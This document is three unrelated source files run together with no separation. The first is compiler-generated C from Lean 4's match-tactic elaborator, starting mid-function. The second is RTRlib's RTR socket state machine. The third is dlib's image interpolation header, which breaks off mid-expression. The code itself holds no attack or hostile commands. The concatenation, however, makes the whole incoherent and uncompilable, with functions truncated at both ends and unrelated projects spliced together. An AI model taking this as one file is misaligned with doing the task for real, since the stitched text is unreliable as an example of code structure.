lean_alloc_closure((void*)(l___private_Lean_Elab_Util_0__Lean_Elab_expandMacro_x3f___boxed), 4, 1); lean_closure_set(x_54, 0, x_43); x_55 = x_54; x_56 = lean_environment_main_module(x_43); x_57 = lean_alloc_ctor(0, 6, 0); lean_ctor_set(x_57, 0, x_55); lean_ctor_set(x_57, 1, x_56); lean_ctor_set(x_57, 2, x_46); lean_ctor_set(x_57, 3, x_48); lean_ctor_set(x_57, 4, x_49); lean_ctor_set(x_57, 5, x_44); lean_inc(x_1); x_58 = l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm(x_12, x_1, x_57, x_53); if (lean_obj_tag(x_58) == 0) { lean_object* x_59; lean_object* x_60; lean_object* x_61; lean_object* x_62; lean_object* x_63; uint8_t x_64; x_59 = lean_ctor_get(x_58, 0); lean_inc(x_59); x_60 = lean_ctor_get(x_58, 1); lean_inc(x_60); lean_dec(x_58); x_61 = lean_st_ref_take(x_9, x_52); x_62 = lean_ctor_get(x_61, 0); lean_inc(x_62); x_63 = lean_ctor_get(x_61, 1); lean_inc(x_63); lean_dec(x_61); x_64 = !lean_is_exclusive(x_62); if (x_64 == 0) { lean_object* x_65; lean_object* x_66; lean_object* x_67; x_65 = lean_ctor_get(x_62, 1); lean_dec(x_65); lean_ctor_set(x_62, 1, x_60); x_66 = lean_st_ref_set(x_9, x_62, x_63); x_67 = lean_ctor_get(x_66, 1); lean_inc(x_67); lean_dec(x_66); x_14 = x_59; x_15 = x_67; goto block_39; } else { lean_object* x_68; lean_object* x_69; lean_object* x_70; lean_object* x_71; lean_object* x_72; lean_object* x_73; x_68 = lean_ctor_get(x_62, 0); x_69 = lean_ctor_get(x_62, 2); x_70 = lean_ctor_get(x_62, 3); lean_inc(x_70); lean_inc(x_69); lean_inc(x_68); lean_dec(x_62); x_71 = lean_alloc_ctor(0, 4, 0); lean_ctor_set(x_71, 0, x_68); lean_ctor_set(x_71, 1, x_60); lean_ctor_set(x_71, 2, x_69); lean_ctor_set(x_71, 3, x_70); x_72 = lean_st_ref_set(x_9, x_71, x_63); x_73 = lean_ctor_get(x_72, 1); lean_inc(x_73); lean_dec(x_72); x_14 = x_59; x_15 = x_73; goto block_39; } } else { lean_object* x_74; lean_dec(x_1); x_74 = lean_ctor_get(x_58, 0); lean_inc(x_74); lean_dec(x_58); if (lean_obj_tag(x_74) == 0) { lean_object* x_75; lean_object* x_76; lean_object* x_77; lean_object* x_78; lean_object* x_79; uint8_t x_80; x_75 = lean_ctor_get(x_74, 0); lean_inc(x_75); x_76 = lean_ctor_get(x_74, 1); lean_inc(x_76); lean_dec(x_74); x_77 = lean_alloc_ctor(2, 1, 0); lean_ctor_set(x_77, 0, x_76); x_78 = lean_alloc_ctor(0, 1, 0); lean_ctor_set(x_78, 0, x_77); x_79 = l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1(x_75, x_78, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_52); lean_dec(x_9); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); lean_dec(x_75); x_80 = !lean_is_exclusive(x_79); if (x_80 == 0) { return x_79; } else { lean_object* x_81; lean_object* x_82; lean_object* x_83; x_81 = lean_ctor_get(x_79, 0); x_82 = lean_ctor_get(x_79, 1); lean_inc(x_82); lean_inc(x_81); lean_dec(x_79); x_83 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_83, 0, x_81); lean_ctor_set(x_83, 1, x_82); return x_83; } } else { lean_object* x_84; uint8_t x_85; lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); x_84 = l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___rarg(x_52); x_85 = !lean_is_exclusive(x_84); if (x_85 == 0) { return x_84; } else { lean_object* x_86; lean_object* x_87; lean_object* x_88; x_86 = lean_ctor_get(x_84, 0); x_87 = lean_ctor_get(x_84, 1); lean_inc(x_87); lean_inc(x_86); lean_dec(x_84); x_88 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_88, 0, x_86); lean_ctor_set(x_88, 1, x_87); return x_88; } } } block_39: { lean_object* x_16; lean_object* x_17; lean_object* x_18; lean_object* x_19; lean_object* x_20; lean_object* x_21; lean_object* x_22; lean_object* x_23; lean_object* x_24; lean_object* x_25; lean_object* x_26; lean_object* x_27; lean_object* x_28; lean_object* x_29; lean_object* x_30; lean_object* x_31; lean_object* x_32; lean_object* x_33; lean_object* x_34; lean_object* x_35; lean_object* x_36; lean_object* x_37; lean_object* x_38; x_16 = lean_ctor_get(x_14, 0); lean_inc(x_16); x_17 = lean_ctor_get(x_14, 1); lean_inc(x_17); lean_dec(x_14); x_18 = l_Lean_MonadRef_mkInfoFromRefPos___at_Lean_Elab_Tactic_evalIntro___spec__1___rarg(x_8, x_9, x_15); x_19 = lean_ctor_get(x_18, 0); lean_inc(x_19); x_20 = lean_ctor_get(x_18, 1); lean_inc(x_20); lean_dec(x_18); x_21 = l_Lean_Elab_Term_getCurrMacroScope(x_4, x_5, x_6, x_7, x_8, x_9, x_20); x_22 = lean_ctor_get(x_21, 1); lean_inc(x_22); lean_dec(x_21); x_23 = l_Lean_Elab_Term_getMainModule___rarg(x_9, x_22); x_24 = lean_ctor_get(x_23, 1); lean_inc(x_24); lean_dec(x_23); x_25 = l_Lean_Parser_Tactic_refine___closed__1; x_26 = lean_alloc_ctor(2, 2, 0); lean_ctor_set(x_26, 0, x_19); lean_ctor_set(x_26, 1, x_25); x_27 = l_Array_empty___closed__1; x_28 = lean_array_push(x_27, x_26); x_29 = lean_array_push(x_28, x_16); x_30 = l_Lean_Parser_Tactic_refine___closed__2; x_31 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_31, 0, x_30); lean_ctor_set(x_31, 1, x_29); x_32 = l_Lean_mkOptionalNode___closed__2; x_33 = lean_array_push(x_32, x_31); x_34 = l_Array_append___rarg(x_33, x_17); lean_dec(x_17); x_35 = l_Lean_nullKind; x_36 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_36, 0, x_35); lean_ctor_set(x_36, 1, x_34); lean_inc(x_36); lean_inc(x_1); x_37 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_adaptExpander___lambda__1), 11, 2); lean_closure_set(x_37, 0, x_1); lean_closure_set(x_37, 1, x_36); x_38 = l_Lean_Elab_withMacroExpansionInfo___at_Lean_Elab_Tactic_adaptExpander___spec__1(x_1, x_36, x_37, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_24); return x_38; } } else { uint8_t x_89; lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); lean_dec(x_1); x_89 = !lean_is_exclusive(x_11); if (x_89 == 0) { return x_11; } else { lean_object* x_90; lean_object* x_91; lean_object* x_92; x_90 = lean_ctor_get(x_11, 0); x_91 = lean_ctor_get(x_11, 1); lean_inc(x_91); lean_inc(x_90); lean_dec(x_11); x_92 = lean_alloc_ctor(1, 2, 0); lean_ctor_set(x_92, 0, x_90); lean_ctor_set(x_92, 1, x_91); return x_92; } } } } lean_object* l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10) { _start: { lean_object* x_11; x_11 = l_Lean_throwError___at_Lean_Elab_Tactic_evalMatch___spec__2(x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10); lean_dec(x_9); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); return x_11; } } lean_object* l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8, lean_object* x_9, lean_object* x_10, lean_object* x_11) { _start: { lean_object* x_12; x_12 = l_Lean_throwErrorAt___at_Lean_Elab_Tactic_evalMatch___spec__1(x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8, x_9, x_10, x_11); lean_dec(x_10); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_1); return x_12; } } lean_object* l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3___boxed(lean_object* x_1, lean_object* x_2, lean_object* x_3, lean_object* x_4, lean_object* x_5, lean_object* x_6, lean_object* x_7, lean_object* x_8) { _start: { lean_object* x_9; x_9 = l_Lean_Elab_throwUnsupportedSyntax___at_Lean_Elab_Tactic_evalMatch___spec__3(x_1, x_2, x_3, x_4, x_5, x_6, x_7, x_8); lean_dec(x_8); lean_dec(x_7); lean_dec(x_6); lean_dec(x_5); lean_dec(x_4); lean_dec(x_3); lean_dec(x_2); lean_dec(x_1); return x_9; } } static lean_object* _init_l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1() { _start: { lean_object* x_1; x_1 = lean_alloc_closure((void*)(l_Lean_Elab_Tactic_evalMatch), 10, 0); return x_1; } } lean_object* l___regBuiltin_Lean_Elab_Tactic_evalMatch(lean_object* x_1) { _start: { lean_object* x_2; lean_object* x_3; lean_object* x_4; lean_object* x_5; x_2 = l_Lean_Elab_Tactic_tacticElabAttribute; x_3 = l_Lean_Parser_Tactic_match___elambda__1___closed__1; x_4 = l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1; x_5 = l_Lean_KeyedDeclsAttribute_addBuiltin___rarg(x_2, x_3, x_4, x_1); return x_5; } } lean_object* initialize_Init(lean_object*); lean_object* initialize_Lean_Parser_Term(lean_object*); lean_object* initialize_Lean_Elab_Match(lean_object*); lean_object* initialize_Lean_Elab_Tactic_Basic(lean_object*); lean_object* initialize_Lean_Elab_Tactic_Induction(lean_object*); static bool _G_initialized = false; lean_object* initialize_Lean_Elab_Tactic_Match(lean_object* w) { lean_object * res; if (_G_initialized) return lean_io_result_mk_ok(lean_box(0)); _G_initialized = true; res = initialize_Init(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); res = initialize_Lean_Parser_Term(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); res = initialize_Lean_Elab_Match(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); res = initialize_Lean_Elab_Tactic_Basic(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); res = initialize_Lean_Elab_Tactic_Induction(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1 = _init_l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1(); lean_mark_persistent(l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__1); l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2 = _init_l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2(); lean_mark_persistent(l_Lean_Elab_Tactic_evalEraseAuxDiscrs___rarg___closed__2); l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1 = _init_l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1(); lean_mark_persistent(l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs___closed__1); res = l___regBuiltin_Lean_Elab_Tactic_evalEraseAuxDiscrs(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); l_Lean_Elab_Tactic_AuxMatchTermState_nextIdx___default = _init_l_Lean_Elab_Tactic_AuxMatchTermState_nextIdx___default(); lean_mark_persistent(l_Lean_Elab_Tactic_AuxMatchTermState_nextIdx___default); l_Lean_Elab_Tactic_AuxMatchTermState_cases___default = _init_l_Lean_Elab_Tactic_AuxMatchTermState_cases___default(); lean_mark_persistent(l_Lean_Elab_Tactic_AuxMatchTermState_cases___default); l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1 = _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1(); lean_mark_persistent(l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__1); l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2 = _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2(); lean_mark_persistent(l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__2); l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3 = _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3(); lean_mark_persistent(l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__3); l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4 = _init_l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4(); lean_mark_persistent(l_Array_mapMUnsafe_map___at___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___spec__2___closed__4); l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1 = _init_l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1(); lean_mark_persistent(l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTermAux___boxed__const__1); l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1 = _init_l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1(); lean_mark_persistent(l___private_Lean_Elab_Tactic_Match_0__Lean_Elab_Tactic_mkAuxiliaryMatchTerm___closed__1); l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1 = _init_l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1(); lean_mark_persistent(l___regBuiltin_Lean_Elab_Tactic_evalMatch___closed__1); res = l___regBuiltin_Lean_Elab_Tactic_evalMatch(lean_io_mk_world()); if (lean_io_result_is_error(res)) return res; lean_dec_ref(res); return lean_io_result_mk_ok(lean_box(0)); } #ifdef __cplusplus } #endif
/* * This file is part of RTRlib. * * This file is subject to the terms and conditions of the MIT license. * See the file LICENSE in the top level directory for more details. * * Website: http://rtrlib.realmv6.org/ */ #include "rtr_private.h" #include "rtrlib/lib/log_private.h" #include "rtrlib/lib/utils_private.h" #include "rtrlib/pfx/pfx_private.h" #include "rtrlib/rtr/packets_private.h" #include "rtrlib/rtrlib_export_private.h" #include "rtrlib/spki/hashtable/ht-spkitable_private.h" #include "rtrlib/transport/transport_private.h" #include <assert.h> #include <pthread.h> #include <signal.h> #include <unistd.h> static void rtr_purge_outdated_records(struct rtr_socket *rtr_socket); static void *rtr_fsm_start(struct rtr_socket *rtr_socket); static const char *socket_str_states[] = {[RTR_CONNECTING] = "RTR_CONNECTING", [RTR_ESTABLISHED] = "RTR_ESTABLISHED", [RTR_RESET] = "RTR_RESET", [RTR_SYNC] = "RTR_SYNC", [RTR_FAST_RECONNECT] = "RTR_FAST_RECONNECT", [RTR_ERROR_NO_DATA_AVAIL] = "RTR_ERROR_NO_DATA_AVAIL", [RTR_ERROR_NO_INCR_UPDATE_AVAIL] = "RTR_ERROR_NO_INCR_UPDATE_AVAIL", [RTR_ERROR_FATAL] = "RTR_ERROR_FATAL", [RTR_ERROR_TRANSPORT] = "RTR_ERROR_TRANSPORT", [RTR_SHUTDOWN] = "RTR_SHUTDOWN"}; int rtr_init(struct rtr_socket *rtr_socket, struct tr_socket *tr, struct pfx_table *pfx_table, struct spki_table *spki_table, const unsigned int refresh_interval, const unsigned int expire_interval, const unsigned int retry_interval, enum rtr_interval_mode iv_mode, rtr_connection_state_fp fp, void *fp_param_config, void *fp_param_group) { if (tr) rtr_socket->tr_socket = tr; // Check if one of the intervals is not in range of the predefined values. if (rtr_check_interval_range(refresh_interval, RTR_REFRESH_MIN, RTR_REFRESH_MAX) != RTR_INSIDE_INTERVAL_RANGE || rtr_check_interval_range(expire_interval, RTR_EXPIRATION_MIN, RTR_EXPIRATION_MAX) != RTR_INSIDE_INTERVAL_RANGE || rtr_check_interval_range(retry_interval, RTR_RETRY_MIN, RTR_RETRY_MAX) != RTR_INSIDE_INTERVAL_RANGE) { RTR_DBG("Interval value not in range."); return RTR_INVALID_PARAM; } rtr_socket->refresh_interval = refresh_interval; rtr_socket->expire_interval = expire_interval; rtr_socket->retry_interval = retry_interval; rtr_socket->iv_mode = iv_mode; rtr_socket->state = RTR_CLOSED; rtr_socket->request_session_id = true; rtr_socket->serial_number = 0; rtr_socket->last_update = 0; rtr_socket->pfx_table = pfx_table; rtr_socket->spki_table = spki_table; rtr_socket->connection_state_fp = fp; rtr_socket->connection_state_fp_param_config = fp_param_config; rtr_socket->connection_state_fp_param_group = fp_param_group; rtr_socket->thread_id = 0; rtr_socket->version = RTR_PROTOCOL_MAX_SUPPORTED_VERSION; rtr_socket->has_received_pdus = false; rtr_socket->is_resetting = false; return RTR_SUCCESS; } int rtr_start(struct rtr_socket *rtr_socket) { if (rtr_socket->thread_id) return RTR_ERROR; int rtval = pthread_create(&(rtr_socket->thread_id), NULL, (void *(*)(void *)) &rtr_fsm_start, rtr_socket); if (rtval == 0) return RTR_SUCCESS; return RTR_ERROR; } void rtr_purge_outdated_records(struct rtr_socket *rtr_socket) { if (rtr_socket->last_update == 0) return; time_t cur_time; int rtval = lrtr_get_monotonic_time(&cur_time); if (rtval == -1 || (rtr_socket->last_update + rtr_socket->expire_interval) < cur_time) { if (rtval == -1) RTR_DBG1("get_monotic_time(..) failed"); pfx_table_src_remove(rtr_socket->pfx_table, rtr_socket); RTR_DBG1("Removed outdated records from pfx_table"); spki_table_src_remove(rtr_socket->spki_table, rtr_socket); RTR_DBG1("Removed outdated router keys from spki_table"); rtr_socket->request_session_id = true; rtr_socket->serial_number = 0; rtr_socket->last_update = 0; rtr_socket->is_resetting = true; } } /* WARNING: This Function has cancelable sections*/ void *rtr_fsm_start(struct rtr_socket *rtr_socket) { if (rtr_socket->state == RTR_SHUTDOWN) return NULL; // We don't care about the old state, but POSIX demands a non null value for setcancelstate int oldcancelstate; pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, &oldcancelstate); rtr_socket->state = RTR_CONNECTING; while (1) { if (rtr_socket->state == RTR_CONNECTING) { RTR_DBG1("State: RTR_CONNECTING"); rtr_socket->has_received_pdus = false; // old pfx_record could exists in the pfx_table, check if they are too old and must be removed // old key_entry could exists in the spki_table, check if they are too old and must be removed rtr_purge_outdated_records(rtr_socket); if (tr_open(rtr_socket->tr_socket) == TR_ERROR) { rtr_change_socket_state(rtr_socket, RTR_ERROR_TRANSPORT); } else if (rtr_socket->request_session_id) { // change to state RESET, if socket doesn't have a session_id rtr_change_socket_state(rtr_socket, RTR_RESET); } else { // if we already have a session_id, send a serial query and start to sync if (rtr_send_serial_query(rtr_socket) == RTR_SUCCESS) rtr_change_socket_state(rtr_socket, RTR_SYNC); else rtr_change_socket_state(rtr_socket, RTR_ERROR_FATAL); } } else if (rtr_socket->state == RTR_RESET) { RTR_DBG1("State: RTR_RESET"); if (rtr_send_reset_query(rtr_socket) == RTR_SUCCESS) { RTR_DBG1("rtr_start: reset pdu sent"); rtr_change_socket_state(rtr_socket, RTR_SYNC); // start to sync after connection is established } } else if (rtr_socket->state == RTR_SYNC) { RTR_DBG1("State: RTR_SYNC"); if (rtr_sync(rtr_socket) == RTR_SUCCESS) rtr_change_socket_state( rtr_socket, RTR_ESTABLISHED); // wait for next sync after first successful sync } else if (rtr_socket->state == RTR_ESTABLISHED) { RTR_DBG1("State: RTR_ESTABLISHED"); // Allow thread cancellation for recv code path only. // This should be enough since we spend most of the time blocking on recv pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, &oldcancelstate); int ret = rtr_wait_for_sync( rtr_socket); // blocks till expire_interval is expired or PDU was received pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, &oldcancelstate); if (ret == RTR_SUCCESS) { // send serial query if (rtr_send_serial_query(rtr_socket) == RTR_SUCCESS) rtr_change_socket_state(rtr_socket, RTR_SYNC); } } else if (rtr_socket->state == RTR_FAST_RECONNECT) { RTR_DBG1("State: RTR_FAST_RECONNECT"); tr_close(rtr_socket->tr_socket); rtr_change_socket_state(rtr_socket, RTR_CONNECTING); } else if (rtr_socket->state == RTR_ERROR_NO_DATA_AVAIL) { RTR_DBG1("State: RTR_ERROR_NO_DATA_AVAIL"); rtr_socket->request_session_id = true; rtr_socket->serial_number = 0; rtr_change_socket_state(rtr_socket, RTR_RESET); sleep(rtr_socket->retry_interval); rtr_purge_outdated_records(rtr_socket); } else if (rtr_socket->state == RTR_ERROR_NO_INCR_UPDATE_AVAIL) { RTR_DBG1("State: RTR_ERROR_NO_INCR_UPDATE_AVAIL"); rtr_socket->request_session_id = true; rtr_socket->serial_number = 0; rtr_change_socket_state(rtr_socket, RTR_RESET); rtr_purge_outdated_records(rtr_socket); } else if (rtr_socket->state == RTR_ERROR_TRANSPORT) { RTR_DBG1("State: RTR_ERROR_TRANSPORT"); tr_close(rtr_socket->tr_socket); rtr_change_socket_state(rtr_socket, RTR_CONNECTING); RTR_DBG("Waiting %u", rtr_socket->retry_interval); pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, &oldcancelstate); sleep(rtr_socket->retry_interval); pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, &oldcancelstate); } else if (rtr_socket->state == RTR_ERROR_FATAL) { RTR_DBG1("State: RTR_ERROR_FATAL"); tr_close(rtr_socket->tr_socket); rtr_change_socket_state(rtr_socket, RTR_CONNECTING); RTR_DBG("Waiting %u", rtr_socket->retry_interval); pthread_setcancelstate(PTHREAD_CANCEL_ENABLE, &oldcancelstate); sleep(rtr_socket->retry_interval); pthread_setcancelstate(PTHREAD_CANCEL_DISABLE, &oldcancelstate); } else if (rtr_socket->state == RTR_SHUTDOWN) { RTR_DBG1("State: RTR_SHUTDOWN"); pthread_exit(NULL); } } } void rtr_stop(struct rtr_socket *rtr_socket) { RTR_DBG("%s()", __func__); rtr_change_socket_state(rtr_socket, RTR_SHUTDOWN); if (rtr_socket->thread_id != 0) { RTR_DBG1("pthread_cancel()"); pthread_cancel(rtr_socket->thread_id); RTR_DBG1("pthread_join()"); pthread_join(rtr_socket->thread_id, NULL); tr_close(rtr_socket->tr_socket); rtr_socket->request_session_id = true; rtr_socket->serial_number = 0; rtr_socket->last_update = 0; pfx_table_src_remove(rtr_socket->pfx_table, rtr_socket); spki_table_src_remove(rtr_socket->spki_table, rtr_socket); rtr_socket->thread_id = 0; } RTR_DBG1("Socket shut down"); } RTRLIB_EXPORT const char *rtr_state_to_str(enum rtr_socket_state state) { return socket_str_states[state]; } /* cppcheck-suppress unusedFunction */ RTRLIB_EXPORT enum rtr_interval_mode rtr_get_interval_mode(struct rtr_socket *rtr_socket) { return rtr_socket->iv_mode; } /* cppcheck-suppress unusedFunction */ RTRLIB_EXPORT void rtr_set_interval_mode(struct rtr_socket *rtr_socket, enum rtr_interval_mode option) { switch (option) { case RTR_INTERVAL_MODE_IGNORE_ANY: case RTR_INTERVAL_MODE_ACCEPT_ANY: case RTR_INTERVAL_MODE_DEFAULT_MIN_MAX: case RTR_INTERVAL_MODE_IGNORE_ON_FAILURE: rtr_socket->iv_mode = option; break; default: RTR_DBG1("Invalid interval mode. Mode remains unchanged."); } }
// Copyright (C) 2012 Davis E. King (davis@dlib.net) // License: Boost Software License See LICENSE.txt for the full license. #ifndef DLIB_INTERPOlATIONh_ #define DLIB_INTERPOlATIONh_ #include "interpolation_abstract.h" #include "../pixel.h" #include "../matrix.h" #include "assign_image.h" #include "image_pyramid.h" #include "../simd.h" #include "../image_processing/full_object_detection.h" namespace dlib { // ---------------------------------------------------------------------------------------- template <typename T> struct sub_image_proxy { sub_image_proxy ( T& img, rectangle rect ) { rect = rect.intersect(get_rect(img)); typedef typename image_traits<T>::pixel_type pixel_type; _nr = rect.height(); _nc = rect.width(); _width_step = width_step(img); _data = (char*)image_data(img) + sizeof(pixel_type)*rect.left() + rect.top()*_width_step; } void* _data; long _width_step; long _nr; long _nc; }; template <typename T> struct const_sub_image_proxy { const_sub_image_proxy ( const T& img, rectangle rect ) { rect = rect.intersect(get_rect(img)); typedef typename image_traits<T>::pixel_type pixel_type; _nr = rect.height(); _nc = rect.width(); _width_step = width_step(img); _data = (const char*)image_data(img) + sizeof(pixel_type)*rect.left() + rect.top()*_width_step; } const void* _data; long _width_step; long _nr; long _nc; }; template <typename T> struct image_traits<sub_image_proxy<T> > { typedef typename image_traits<T>::pixel_type pixel_type; }; template <typename T> struct image_traits<const sub_image_proxy<T> > { typedef typename image_traits<T>::pixel_type pixel_type; }; template <typename T> struct image_traits<const_sub_image_proxy<T> > { typedef typename image_traits<T>::pixel_type pixel_type; }; template <typename T> struct image_traits<const const_sub_image_proxy<T> > { typedef typename image_traits<T>::pixel_type pixel_type; }; template <typename T> inline long num_rows( const sub_image_proxy<T>& img) { return img._nr; } template <typename T> inline long num_columns( const sub_image_proxy<T>& img) { return img._nc; } template <typename T> inline long num_rows( const const_sub_image_proxy<T>& img) { return img._nr; } template <typename T> inline long num_columns( const const_sub_image_proxy<T>& img) { return img._nc; } template <typename T> inline void* image_data( sub_image_proxy<T>& img) { return img._data; } template <typename T> inline const void* image_data( const sub_image_proxy<T>& img) { return img._data; } template <typename T> inline const void* image_data( const const_sub_image_proxy<T>& img) { return img._data; } template <typename T> inline long width_step( const sub_image_proxy<T>& img ) { return img._width_step; } template <typename T> inline long width_step( const const_sub_image_proxy<T>& img ) { return img._width_step; } template < typename image_type > sub_image_proxy<image_type> sub_image ( image_type& img, const rectangle& rect ) { return sub_image_proxy<image_type>(img,rect); } template < typename image_type > const const_sub_image_proxy<image_type> sub_image ( const image_type& img, const rectangle& rect ) { return const_sub_image_proxy<image_type>(img,rect); } // ---------------------------------------------------------------------------------------- // ---------------------------------------------------------------------------------------- class interpolate_nearest_neighbor { public: template <typename image_view_type, typename pixel_type> bool operator() ( const image_view_type& img, const dlib::point& p, pixel_type& result ) const { COMPILE_TIME_ASSERT(pixel_traits<typename image_view_type::pixel_type>::has_alpha == false); if (get_rect(img).contains(p)) { assign_pixel(result, img[p.y()][p.x()]); return true; } else { return false; } } }; // ---------------------------------------------------------------------------------------- class interpolate_bilinear { template <typename T> struct is_rgb_image { const static bool value = pixel_traits<typename T::pixel_type>::rgb; }; public: template <typename T, typename image_view_type, typename pixel_type> typename disable_if<is_rgb_image<image_view_type>,bool>::type operator() ( const image_view_type& img, const dlib::vector<T,2>& p, pixel_type& result ) const { COMPILE_TIME_ASSERT(pixel_traits<typename image_view_type::pixel_type>::has_alpha == false); const long left = static_cast<long>(std::floor(p.x())); const long top = static_cast<long>(std::floor(p.y())); const long right = left+1; const long bottom = top+1; // if the interpolation goes outside img if (!(left >= 0 && top >= 0 && right < img.nc() && bottom < img.nr())) return false; const double lr_frac = p.x() - left; const double tb_frac = p.y() - top; double tl = 0, tr = 0, bl = 0, br = 0; assign_pixel(tl, img[top][left]); assign_pixel(tr, img[top][right]); assign_pixel(bl, img[bottom][left]); assign_pixel(br, img[bottom][right]); double temp = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + tb_frac*((1-lr_frac)*bl + lr_frac*br); assign_pixel(result, temp); return true; } template <typename T, typename image_view_type, typename pixel_type> typename enable_if<is_rgb_image<image_view_type>,bool>::type operator() ( const image_view_type& img, const dlib::vector<T,2>& p, pixel_type& result ) const { COMPILE_TIME_ASSERT(pixel_traits<typename image_view_type::pixel_type>::has_alpha == false); const long left = static_cast<long>(std::floor(p.x())); const long top = static_cast<long>(std::floor(p.y())); const long right = left+1; const long bottom = top+1; // if the interpolation goes outside img if (!(left >= 0 && top >= 0 && right < img.nc() && bottom < img.nr())) return false; const double lr_frac = p.x() - left; const double tb_frac = p.y() - top; double tl, tr, bl, br; tl = img[top][left].red; tr = img[top][right].red; bl = img[bottom][left].red; br = img[bottom][right].red; const double red = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + tb_frac*((1-lr_frac)*bl + lr_frac*br); tl = img[top][left].green; tr = img[top][right].green; bl = img[bottom][left].green; br = img[bottom][right].green; const double green = (1-tb_frac)*((1-lr_frac)*tl + lr_frac*tr) + 